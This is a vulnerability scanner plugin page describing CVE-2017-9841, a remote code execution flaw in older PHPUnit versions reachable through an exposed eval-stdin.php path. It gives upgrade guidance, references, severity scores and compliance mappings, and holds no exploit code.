PHPUnit Remote Code Execution

critical Web App Scanning Plugin ID 98984

Language:

Synopsis

PHPUnit Remote Code Execution

Description

PHPUnit is a testing framework for PHP built to perform unit tests in the application development cycle. PHPUnit versions before 4.8.28 and 5.x before 5.6.3 allow remote attackers to execute arbitrary PHP code via the /vendor/phpunit/src/Util/PHP/eval-stdin.php URI when exposed.

Solution

Upgrade at least to versions 4.8.28 or 5.6.3.
Some vendors bundle PHPUnit with their software releases without using it. If not required, check with the vendor if this can be safely removed from the application.

See Also

http://web.archive.org/web/20170701212357/http://phpunit.vulnbusters.com/

https://github.com/sebastianbergmann/phpunit/commit/284a69fb88a2d0845d23f42974a583d8f59bf5a5

Plugin Details

Severity: Critical

ID: 98984

Type: remote

Family: Component Vulnerability

Published: 3/11/2020

Updated: 9/7/2021

Scan Template: api, basic, full, pci, scan

Risk Information

VPR

Risk Factor: Critical

Score: 9.0

CVSS v2

Risk Factor: High

Base Score: 7.5

Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS Score Source: CVE-2017-9841

CVSS v3

Risk Factor: Critical

Base Score: 9.8

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS Score Source: CVE-2017-9841

Vulnerability Information

CPE: cpe:2.3:a:phpunit_project:phpunit:*:*:*:*:*:*:*:*

Exploit Available: true

Exploit Ease: No known exploits are available

CISA Known Exploited Vulnerability Due Dates: 8/15/2022

Reference Information

CVE: CVE-2017-9841

BID: 101798

CWE: 94

OWASP: 2010-A1, 2013-A1, 2013-A9, 2017-A1, 2017-A9, 2021-A3, 2021-A6

WASC: OS Commanding

CAPEC: 242, 35, 77

DISA STIG: APSC-DV-002510, APSC-DV-002630

HIPAA: 164.306(a)(1), 164.306(a)(2)

ISO: 27001-A.14.2.5

NIST: sp800_53-CM-6b, sp800_53-SI-10

OWASP API: 2019-API7, 2019-API8, 2023-API8

OWASP ASVS: 4.0.2-14.2.1, 4.0.2-5.2.5

PCI-DSS: 3.2-6.2, 3.2-6.5.1